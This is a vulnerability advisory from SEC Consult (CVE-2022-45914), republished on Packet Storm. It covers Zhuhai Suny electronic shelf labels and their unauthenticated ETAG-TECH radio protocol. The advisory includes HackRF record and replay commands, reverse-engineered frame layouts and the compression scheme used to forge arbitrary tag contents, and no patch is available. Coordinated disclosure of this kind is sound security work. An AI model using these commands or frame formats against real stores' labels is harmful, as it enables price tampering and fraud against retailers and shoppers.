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packetstormSteffen Robertz, sec-consult.comPACKETSTORM:170177
HistoryDec 09, 2022 - 12:00 a.m.

Zhuhai Suny Technology ESL Tag Forgery / Replay Attacks

Steffen Robertz,
replay attack
etag-tech protocol
displaying arbitrary contents
electronic shelf labels
security advisory
sec consult





`SEC Consult Vulnerability Lab Security Advisory < 20221201-0 >  
title: Replay attacks & Displaying arbitrary contents  
product: Zhuhai Suny Technology ESL Tag / ETAG-TECH protocol  
(electronic shelf labels)  
vulnerable version: All  
fixed version: -  
CVE number: CVE-2022-45914  
impact: critical  
found: 2022-05-27  
by: Steffen Robertz (Office Vienna)  
SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Atos company  
Europe | Asia | North America  
Vendor description:  
"Zhuhai Suny Technology Co., Ltd, founded in 2016 and located in Zhuhai  
Guangdong, is the manufacturer of electronic shelf labels and Alibaba  
Super Key Account Gold Supplier specializing in ESL with over 10 years’  
experiences focusing on helping customers reduce cost and boost sales.  
Since its founding, Suny has attached great importance to exploring  
both international and domestic markets, thus becoming China’s top 1  
manufacturer of electronic shelf labels. Its products have been widely  
applied in supermarkets, retail stores, pharmacies, warehouses,  
exhibitions, etc. We has currently provided services to customers from  
more than 180 countries, and total sales in 2020 have exceeded  
15 million US dollars."  
Business recommendation:  
The vendor did not respond to our communication attempts, there is no patch  
available. In case you are using the product, contact the vendor and urge  
them to fix the security vulnerabilities.  
SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.  
The research has also been presented at various security conferences such as, named "Self-labeling electronic shelf labels".  
Vulnerability overview/description:  
1) Replay Attack  
The displayed information on the price tag can be updated via a 433 MHz  
custom protocol (called ETAG-TECH). An attacker can record transmitted  
RF samples and replay them later to cause the same action. Thus, it is  
possible to restore an older price on the tag without the need for any  
information about the protocol or tag.  
2) Forging ETAG-TECH protocol messages to display arbitrary content (CVE-2022-45914)  
The ETAG-TECH protocol was reverse engineered. It was noted, that no  
authentication is existent. Hence, one can display arbitrary content  
on the electronic tag by simply transmitting messages according to the  
Proof of concept:  
1) Replay Attack  
The tag and base station communicate at 433.264 MHz. Thus, the following  
HackRF command can be used to record a transmission:  
hackrf_transfer -r /tmp/old_price -f 433264000 -s 4000000 -a 1 -x 43 -l 16 -g 20  
The following command was used in order to replay the signal:  
hackrf_transfer -t /tmp/old_price -f 433264000 -s 4000000 -a 1 -x 43 -l 16 -g 20  
A video of the attack has been published here:  
2) Forging ETAG-TECH protocol messages to display arbitrary content (CVE-2022-45914)  
The base station will transmit a compressed image to the tag. Thus,  
any content can be displayed.  
Following steps will have to happen:  
I) Send wake-up frames to the tag.  
II) Compress the picture that should be displayed.  
III) Wrap the compressed picture into the picture data structure.  
IV) Split the data structure into the image frames.  
V) Listen for the tag's response.  
I) The Wake-up Frame:  
The CRC is calculated over the whole frame, starting with the frame length  
field. The frame counter is counting down to zero. Every unique frame  
(=unique frame counter) is sent five times. The frame is transmitted at  
175 kBaud.  
| Preamble | Sync Header | Frame Length | Tag ID | Fixed Value | Frame Counter | Fixed Value | CRC16 |  
| AAAAAAAAAAAAAAAA | D391D391 | 08 | 065302 | 0000 | 0398 | 0A | CRC |  
II) The Compression Algorithm:  
Runlength encoding is used as compression algorithm. The image is read in  
rows. An "a" stands for either a 1 or 0, depending on if it's a run of  
ones or zeros that is being encoded. A "c" stands for the length of the  
There are four different cases:  
Case 1: Less than 8 consecutive bits  
Case 2: Less than 32 consecutive bits  
Case 3: Less than 256 consecutive bits  
0b1a000000 0bcccccccc  
Case 4: Less than 2^16 consecutive bits  
0b0a000000 0bcccccccc 0bcccccccc  
III) The picture data structure  
The compression header indicates the color channel:  
FC00000000 = black  
FC80000000 = red  
| LED | Batch Code | Fixed Value | LED Time | Compression header | Display Height | Display Width | Compressed Image Data |  
| 0700 | BF75 | 00ED | 000A | FC00000000 | 007F | 0127 | <Compressed Image Data> |  
IV) The Image Frames  
Image frames can only hold 54 Bytes of data. Thus the previously generated  
image data structure is split into chunks of 54 bytes or less.  
The CRC is calculated over the whole frame, starting with the frame length  
field. The frame counter indicates frame 1 out of 9. The frame is transmitted  
at 100 kBaud.  
| Preamble | Sync Header | Frame Length | Tag ID | Frame Counter | Fixed Value | Payload | CRC16 |  
| AAAAAAAAAAAAAAAA | D391D391 | 08 | 065302 | 0901 | 33 | <Image Data Structure> | CRC |  
V) The Tag's Response  
The frame is transmitted at 100 kBaud and repeated three times.  
| Preamble | Sync Header | Frame Length | Tag ID | Battery Voltage | RSSI | Temperature | CRC16 |  
| AAAAAAAAAAAAAAAA | D391D391 | 07 | 065302 | 1D = 2.9V | 2068 | E9 = 23.3C | CRC |  
Following these steps, custom images can be sent over the ETAG-TECH protocol.  
The only required information is the tag ID which is printed on the tag.  
Otherwise it can be sniffed by listening to the RF interface and waiting for base  
station communication. Thus, the tag can be fully controlled by an attacker.  
Videos of the attack have been published here:  
* Displaying arbitrary tag contents:  
* Receiving arbitrary ESL-TECH messages:  
Vulnerable / tested versions:  
No version information could be identified for this product.  
Vendor contact timeline:  
2022-08-14: Contacting vendor through [email protected] and [email protected]  
No response.  
2022-08-27: Contacting vendor through [email protected], no response.  
2022-09-12: Contacting vendor again, communicating public release for October  
No response.  
2022-12-01: Public release of security advisory.  
The vendor did not respond to our communication attempts, there is no patch  
available. In case you are using the product, contact the vendor and urge them  
to fix the security vulnerabilities.  
Advisory URL:  
SEC Consult Vulnerability Lab  
SEC Consult, an Atos company  
Europe | Asia | North America  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.  
Interested to work with the experts of SEC Consult?  
Send us your application  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices  
Mail: security-research at sec-consult dot com  
EOF S. Robertz / @2022  





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